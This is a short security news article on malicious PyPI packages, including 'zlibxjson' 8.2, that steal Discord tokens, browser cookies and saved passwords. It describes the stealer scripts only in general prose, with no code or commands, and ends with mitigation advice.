Malicious PyPI Packages Expose User Credentials

Python Package Index malware

The FortiGuard Labs team has uncovered a series of malicious packages lurking within the Python Package Index (PyPI), the official repository for Python software packages. These malicious packages, including the recently discovered “zlibxjson” version 8.2, pose a grave threat to users, potentially leading to the theft of sensitive information like Discord tokens, browser cookies, and stored passwords.

The malicious packages exploit vulnerabilities in PyPI’s infrastructure to inject harmful code into seemingly legitimate software downloads. Once installed, the malicious code can stealthily extract sensitive data from users’ systems, including login credentials and financial information, which can then be transmitted to attacker-controlled servers.

This package contains a malicious URL that downloads various files, including an executable packed with PyInstaller. Upon execution, the .exe file unpacks several .pyc files, which are then decompiled into Python scripts. Among the numerous files discovered, three stood out for their particularly malicious nature:

1. Discord_token_grabber.py

This script is designed to steal sensitive information from Discord users, sending it to an external server controlled by the attacker. Key malicious activities include:

  • Token Extraction: The script searches for Discord tokens on the user’s local machine, which can be used to authenticate with Discord’s API. This allows the attacker unauthorized access to the victim’s Discord account.
  • Decryption of Stored Data: It decrypts stored tokens and passwords using the system’s master key, granting access to secure data.
  • Data Exfiltration: The extracted tokens and user information are sent to the attacker’s server, including user profiles, billing details, and more.
  • Persistence and Evasion: The script incorporates retry mechanisms to ensure continuous operation, even if initial attempts fail.

2. get_cookies.py

This file engages in critical malicious activities, including:

  • Cookie Theft: It steals cookies from browsers like Chrome, Firefox, Brave, and Opera, which often contain session tokens and login credentials.
  • Decryption of Stored Data: Using the system’s master key, it decrypts the cookies stored by the browsers.
  • Data Exfiltration: The decrypted cookies are saved in a file (cookies.txt), indicating a clear intent to gather and transfer sensitive data.

3. password_grabber.py

This script targets saved passwords from web browsers such as Google Chrome and Microsoft Edge. Detailed malicious actions include:

  • Unauthorized Access: The script accesses databases where browsers store login data and extracts encrypted passwords.
  • Decryption of Data: It decrypts the extracted passwords using the browser’s encryption key, storing the data in a dictionary for potential exfiltration.
  • Data Cleanup: The script removes traces by deleting copied database files after extracting the data.

To mitigate the risk, users are urged to immediately remove the affected packages and change passwords for any potentially compromised accounts. Organizations should review their software dependencies and ensure they are using trusted and verified sources.

Related Posts: